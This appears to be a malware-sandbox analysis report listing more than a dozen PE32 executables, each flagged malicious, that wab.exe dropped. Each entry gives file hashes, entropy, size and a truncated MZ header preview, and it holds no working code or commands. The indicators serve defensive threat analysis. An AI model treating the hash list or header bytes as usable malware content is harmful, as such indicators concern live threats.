                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):2970664
                                                                                                Entropy (8bit):3.820583432588951
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rk2d0qVmvzC1SvXKo3NzbsZ6DdIAZcbEcofUnpfRII8Lp9qgN3WJp0Rf5NGpHsh:v/V/CfDhNG5sMXjjzmEPoL
                                                                                                MD5:E9C85E1FA1B8589A48F3EB64AC2AEF55
                                                                                                SHA1:79FC306650CA197E7EAD24B543C648A05F2135A7
                                                                                                SHA-256:68177C8014C778BD17E522F2BE6FE4EC0D8C81BA3B99B2A7EF9787CFA13D8778
                                                                                                SHA-512:DD6074E277BDB8C32F60C4D5B597A2765B302C528C83FA7C9241172376734CC4B192F4B51FBD49DF3DCCA402D250C1F5A9A4F629F1EE945F0A480ACF60D26774
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):3531712
                                                                                                Entropy (8bit):3.7529139446179247
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rkmKGOKsuWoZ65B/SRDF7eYECYK6QojSgQojS+E1c9zvWiYwOsqE1c93se1jLvI:psSR7PYKzz38YwZItvsDu7DbDhRAUzHW
                                                                                                MD5:99E2EFC53DBFF45C58BD02DE092DA361
                                                                                                SHA1:23D1B97242F3ABE6A2FA2760979E685CE6C0E2A4
                                                                                                SHA-256:75AA16261BB138BB189DCED02C4F2513B1708A34EF6D32DCA7488F274C12C848
                                                                                                SHA-512:1BFF3410DB57ACAFA690187E5F8FB371BFDB7CF98A5CBA8CE994A3F5C3772343B29638B977C498DB665F6AA2A6339846D2CB999E9A34F68730E327831B0F219D
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):4319272
                                                                                                Entropy (8bit):3.79026092720144
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:lmRfvlTZY/C3ul0ywb/uXMo+YJ7M41zXLWIB:l+6M+595B
                                                                                                MD5:27172A2CB05C40580B9017E397CFEB83
                                                                                                SHA1:F6BEE6DB343B8872D2A7C76257634DD19D7C7D79
                                                                                                SHA-256:4723D994C08DD93D23FEAA220B856AF02E1321E03195AFD52556DAF0405BFE32
                                                                                                SHA-512:DE7C44A923213B546719B4FAC292E1A4FE3F986578B8AC694BA5AF0F6BB463308434C3AE37D098F126558EE09FBCA39F6D85B4FB87694C63A789E4A50359861C
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):1082008
                                                                                                Entropy (8bit):3.688463156686676
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rk2o4TUawK1uT040i0ougmQmJDJnJ+20FxPlJPPSSfzZ9Ar9oN:I243xmQm59UtUSfz3
                                                                                                MD5:3A47AB68F40340B1078860C968FE8489
                                                                                                SHA1:D3DBB2A372C6029BE19317E59B7EF37E2C9361A5
                                                                                                SHA-256:45C4B4E0A6EFBA693B88B201A7BF6B1B6AA1B468DBED7108F059A694E4EB024C
                                                                                                SHA-512:0A4F4305AEA86FCDCEF65D5665BD9573692B6507A79AA0EE64973AF561E065A22A14B706A17C787DF220850ECA701CBA463D800F3693D74FF842C3011B995266
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):582184
                                                                                                Entropy (8bit):6.307656763450446
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:RLWET8DS698nGX2OduCwUJWh/JmmS3DAjqnkrzFoEh+vMKC239YUFgBdQ/:RLxT8DhyiLduCe/lSpn6zOvYUFg4/
                                                                                                MD5:8E107EC5C05E14ADBD1E438D34E95933
                                                                                                SHA1:24886C632652861525F572C7BF712C5EA77FA528
                                                                                                SHA-256:C22DC2815FC5A8EA00A8E6C24369DFFC739E40D70C855E8D0CC4FC880852C1C9
                                                                                                SHA-512:E39FFD9CDB5606E18F8FE9ABBB7D8B4EE541E6930B60E9726531706252FC403E9A44EF16143DC23B4C3ABCCBF6026FE5C0F5B6A2470F8DBB042F5FCF1B165C1E
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):3837992
                                                                                                Entropy (8bit):6.430735070062025
                                                                                                Encrypted:false
                                                                                                SSDEEP:49152:nB1sstqMHiq8kBfK9a+cOVE/TqEpEepIkRqqUu9wg6KFYso8l8EK:7HzorVmr2FkRpdJYolA
                                                                                                MD5:2F12C8B3D0AD5544C44A027661513F42
                                                                                                SHA1:ECEE87DEE3CBC301B9667EE8D4E71B44ACD6E1C0
                                                                                                SHA-256:80A2436A6A0D526D1A194CF0FD93704BB00DD853CC75882F007FD1FD1634E92D
                                                                                                SHA-512:686A0711379700973F8C63F3AE163D5302AE770DAF8AD64D1FB405C254524D8534892C65EB6686D89D4A4BC27C2CE142F1FB14E46B55F1EE8E190405E2949742
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):161832
                                                                                                Entropy (8bit):5.761346604218296
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rkl2VSd2ga8KActASiZAkXS1xU5M3XgcoT0cs4qIm6Y6:5VSktVjv3Xg5T0FIY6
                                                                                                MD5:547C9C694BBBB41A9D14ACB071FD2655
                                                                                                SHA1:CFAB946D63B2FD3AD9B25A7C24F43FBDCDFCB66D
                                                                                                SHA-256:B4EAE61AE843F58EB2F4A30FFEC9E818806A15D0B897F4939232930600AC6F32
                                                                                                SHA-512:EE25C544B05408FDD1C42396FEEDC734E2A966FD173BEBCC56995D86914F183F2487791C1204157032648AB26F4BF7A161212D173371395BC974DE30CE02F556
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):1827880
                                                                                                Entropy (8bit):6.514076024677014
                                                                                                Encrypted:false
                                                                                                SSDEEP:24576:phDdVrQwm5ztlU0A7fMAHmpmZ3QXE/0/lVaLpmasGvP0:phDdVrQ95RW0Y9HyWQXE/09Val0GE
                                                                                                MD5:F89BA0EA3E9D573B68F776CDF7F7CDD7
                                                                                                SHA1:CAE2E1EA681B990AC9E14D5DD7224A69DCDC134D
                                                                                                SHA-256:C2338FC4DD77DF806830471324BEFB0C8BF90042EC166A04B733F3B1174291DB
                                                                                                SHA-512:8E2D6C493B6C955B867F52795232CAA33CE95A5D615F834AFDBC09B12750E23C03A771C0C4190AF00958B5E449030B2A221DCE4955A3AA241729DB60237AADA4
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):1297448
                                                                                                Entropy (8bit):6.477378890661513
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:BdoA0Eh2XptoQZRuefMYR6RrAJU9CsxmMocSipEylqFfouDMA+nkSddSDBDIq:B70E0ZCQZMip6Rrt9RoctGfmdd0
                                                                                                MD5:DF4B1DE5F9CEE22E7C47D5023ED73F23
                                                                                                SHA1:38329123EEC0496BBE07B3B274F139E809705943
                                                                                                SHA-256:0EF0AD16A9F6E054F3FDDE1DD2984DFCE8F4466F44CA616C78B03577A6ACEC1B
                                                                                                SHA-512:8207A1DC020412B5A924665043AF347437825E128122DC93EEF4ED7122D98E0695183637F4D56EDE014EF95235D659A35B5011FB4D701867742090BD3F4308AD
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):4251688
                                                                                                Entropy (8bit):6.49452169775478
                                                                                                Encrypted:false
                                                                                                SSDEEP:49152:ppawZh+vD5oLv9eqJ/iUPnspBu/MLPgyLMLQB4gQDyJ0ryMOAqk9l/hO2y/BT:+ehFLvTQDpB5oSOmlBl
                                                                                                MD5:D7F3BB1C8DDD48162CFB914CC0BD2B28
                                                                                                SHA1:7C88DEA6E637E95D486769CAC5195D76D61CAD8D
                                                                                                SHA-256:A6578F4E1089C55627499E1EA32386041BFEE10CD3ADB90F9D2098F90A92C99A
                                                                                                SHA-512:5B9276369DA9D1962716AF74C3098ABA884FC56E5067A00DCC17A1924204B63EF8250003F50FEC43EC676DDC7357F398017ACDCFB89A4B4B6351394822797237
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):1319976
                                                                                                Entropy (8bit):6.467419492813544
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:+yeb4D2VLtrQA1Yim7XGLZxHwlqxlThfkY8bo0cITiLEpPoVfMA+nkthF2g0oz5:+iD2VmA1YXQHwlklb8boUuWPg2gX
                                                                                                MD5:1DA657653D9309EC964A8A4EE00C297F
                                                                                                SHA1:EDA6072D4BBB59A9840B746C9A3B51E3FCFF746F
                                                                                                SHA-256:FF51B182FA83FE86E0B41327CCB61191DC85DD01E39FE31E9F36F06183795FD5
                                                                                                SHA-512:2F37150DB52489D79CE150EB1E29B14F1652244CE7BE7D7B01B179003392DA57D4314207720A59683604A34A192F49E9C8B06405CABAF0CE51657D65BFED1AA0
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):2327080
                                                                                                Entropy (8bit):6.50909197138894
                                                                                                Encrypted:false
                                                                                                SSDEEP:24576:AfD3zcv9ZhsSGSQoryOzozU63IqRNhB0kDKPHkkkkkkkBoIeAz:AfD3zO9ZhBGlopzM3HRNr00z
                                                                                                MD5:5F13BB2123CD84449668B7BE660E03A1
                                                                                                SHA1:C7840723CCCF0A98FA164DE55C97FEAE9BC07103
                                                                                                SHA-256:69E2DC86A07D17BD965031B1E39EC2921531EF0DA5AC8DE3939E264A606232DF
                                                                                                SHA-512:894BBA05A32679B584297B0E53ACB71DAEDDC63AE4B0247E42DDC873BF83404464386B2B1B38D0020607BF0F1C34210AD629ADC8B88E21A289CDF64E50E4680F
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):3790800
                                                                                                Entropy (8bit):6.5248807406109455
                                                                                                Encrypted:false
                                                                                                SSDEEP:49152:UTaRe7mkn5KLvD5qGVC008Jpb4tgLUgGEsLABD5wTQh07yrLMLl9YPhe:3I72LvkrCpbxJRoIMx
                                                                                                MD5:4EFF0AAEA467EF4BEA361BBDF3E0C47E
                                                                                                SHA1:F6B0C7F4065F41C95C81CC0578AFCBC2352ED2A6
                                                                                                SHA-256:C464CD450FB9402368912118E6E5AC38B995032C2FDFE370A7C4FBC351C1673E
                                                                                                SHA-512:5E55C90A8FC5C1F12FBC93CAECC3235941087E1B3E7756EF3416E27D8150594DAC47E1530C6B57373A715FD0715872D4B3E1CE3C5FE2D717ED7F33D031E842BE
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):1535528
                                                                                                Entropy (8bit):6.485837874399157
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:A406WoyJHeFOqDRA7uKk+TjnkgiMnQq+UI7MBImQWkv7yfOYIXbwohMA+nkXZnHC:NW9Jml9mmijZiMnF+ZxmQWcbLw8Vi
                                                                                                MD5:DEC9D082187C2E2FD9CEC20ED67609C6
                                                                                                SHA1:967A517741026C7A019909DD3F49832C3BAEE723
                                                                                                SHA-256:7AC72A6466BF243F870520E026999B2920E851DC16DFA44241EAB92F1B371CD2
                                                                                                SHA-512:568B47F306872D8B23DA5ACD9419D1A53A3DC3D802157BC74E40B961D0DA70C2BA09B22AC3D24581917020FC0874C12C498390E208BF0FA54714707B422982D3
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):1273384
                                                                                                Entropy (8bit):6.477930816210187
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:U5eN+kL3gVeYt/uakJMtleRO40BbdJrPVJAzAlPY6mYzJuomPMA+nkVogIkd9:UwNHwoYhua6MtERO4qbBJTY6mY1uIgp
                                                                                                MD5:D52F2208641A2193606B49DE2AC097C0
                                                                                                SHA1:B5AFE076C247DC9D0A51C5D99C9C6870C48E8D3A
                                                                                                SHA-256:277C7CB868F05FC05807E1B84B0B01B4B53BAE16BF45576A7A56786FF7087627
                                                                                                SHA-512:134102FC9A5D24A0B2E7E273F3027543F2847B6C3D7E6CE1763D54F2D4FA80A3C0A6581F641064C5F878DEB8A541AC773454968C5453090F03F5C2427B3AFE4E
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):4251688
                                                                                                Entropy (8bit):6.49452169775478
                                                                                                Encrypted:false
                                                                                                SSDEEP:49152:ppawZh+vD5oLv9eqJ/iUPnspBu/MLPgyLMLQB4gQDyJ0ryMOAqk9l/hO2y/BT:+ehFLvTQDpB5oSOmlBl
                                                                                                MD5:D7F3BB1C8DDD48162CFB914CC0BD2B28
                                                                                                SHA1:7C88DEA6E637E95D486769CAC5195D76D61CAD8D
                                                                                                SHA-256:A6578F4E1089C55627499E1EA32386041BFEE10CD3ADB90F9D2098F90A92C99A
                                                                                                SHA-512:5B9276369DA9D1962716AF74C3098ABA884FC56E5067A00DCC17A1924204B63EF8250003F50FEC43EC676DDC7357F398017ACDCFB89A4B4B6351394822797237
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):1319976
                                                                                                Entropy (8bit):6.467419492813544
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:+yeb4D2VLtrQA1Yim7XGLZxHwlqxlThfkY8bo0cITiLEpPoVfMA+nkthF2g0oz5:+iD2VmA1YXQHwlklb8boUuWPg2gX
                                                                                                MD5:1DA657653D9309EC964A8A4EE00C297F
                                                                                                SHA1:EDA6072D4BBB59A9840B746C9A3B51E3FCFF746F
                                                                                                SHA-256:FF51B182FA83FE86E0B41327CCB61191DC85DD01E39FE31E9F36F06183795FD5
                                                                                                SHA-512:2F37150DB52489D79CE150EB1E29B14F1652244CE7BE7D7B01B179003392DA57D4314207720A59683604A34A192F49E9C8B06405CABAF0CE51657D65BFED1AA0
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):1273384
                                                                                                Entropy (8bit):6.477930816210187
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:U5eN+kL3gVeYt/uakJMtleRO40BbdJrPVJAzAlPY6mYzJuomPMA+nkVogIkd9:UwNHwoYhua6MtERO4qbBJTY6mY1uIgp
                                                                                                MD5:D52F2208641A2193606B49DE2AC097C0
                                                                                                SHA1:B5AFE076C247DC9D0A51C5D99C9C6870C48E8D3A
                                                                                                SHA-256:277C7CB868F05FC05807E1B84B0B01B4B53BAE16BF45576A7A56786FF7087627
                                                                                                SHA-512:134102FC9A5D24A0B2E7E273F3027543F2847B6C3D7E6CE1763D54F2D4FA80A3C0A6581F641064C5F878DEB8A541AC773454968C5453090F03F5C2427B3AFE4E
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):225232
                                                                                                Entropy (8bit):5.590089703655568
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rkBcxiNNpCPPQPg2cluc/Xswbz8cz3quKoNX1gd:YcwVz4B8c37KoNX1q
                                                                                                MD5:0822CF9C8E0FBEB192BAF4924558F9EF
                                                                                                SHA1:D051B71CC415AAB8760593D963060600EA1D561B
                                                                                                SHA-256:68CA5048EBA160EC9CF32A2D8F48007D3559AF1E5540A77F4A8303B5B76C0809
                                                                                                SHA-512:6A1BED580C552BACFF1F66CDB92E15015A42559E7771245825C7B63C0D69A1621676E68B2430F6F5D6D2ED87A4F44BFC5B0CE2A9B1F82DA68EB8012A5198F84F
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):247760
                                                                                                Entropy (8bit):5.4946983581508615
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rk4W4l/DReos0gXf+EvC6C36eCWdMuoB+ISzBqUGxNtvKAbFP3cSEt0phcxAT5U:fl/DRfkTC3dM7B+mCivAT
                                                                                                MD5:2FB36922FE765D104C467862052EBEF8
                                                                                                SHA1:22A4F92530018C5751DFFC31CEECA92FD6595960
                                                                                                SHA-256:255C40122758C9EBBAB4D7EED934874AAC93CA0115EB3908E7D6BF284027B34C
                                                                                                SHA-512:7967C653DDB8DCCDD70CACAA3DAF5FB653D070D572F9527798A494B405DD0BB0D9A4F97AD9B370F1BBE2CDBD9C75376682949AAAC9E3AB47687E1536A3D5D6BE
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):142288
                                                                                                Entropy (8bit):6.010441905708692
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rkE684ePKoTB+IvoAewtxUff8aohGme+YDfYz8FrR7:jrTB+AleYIkifYUF
                                                                                                MD5:60B8D642590E6752206C2D4C4572F552
                                                                                                SHA1:F90AEEF8450BA2672909E794882E252DAF200FE3
                                                                                                SHA-256:0CCA065FD181AAAE1D87076E56FEFBDCE2D6C038550ED6EF7E24A6D377C51F55
                                                                                                SHA-512:FB0E15378BEE48594701460890635BD3710C35A43A0B52C3DF2E1A3B7C629541A377BC21C2EAC963667047DC210EEDB66D5AD6B88D98FD4E0A24288F0B60DF21
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):259024
                                                                                                Entropy (8bit):5.843284257427227
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rknXEV0tle+5IbvBCMmNginHy8lZoY46Mu/rLogrlKq9YXI35EvMl:sUVwleMITTmNv1ohWsqYI354I
                                                                                                MD5:724461D9FADE55B6FB8024A7CECE86BD
                                                                                                SHA1:31C171F23D66938373F3E313412E2E27F1FB1F6D
                                                                                                SHA-256:BE208C4A573B7067F7368C334ABB45ACA68CE3A6672CD5E47DE908B59880A4CF
                                                                                                SHA-512:E1AEB088FD312F5D1EAD891D2FCE7958CB7EDA9099407F875604A39C7B44651179EE6DB97A10C54C7F50A85C5EF404E07278C1A0FFD15AE779C5FAD2391BEAD4
                                                                                                Malicious:true
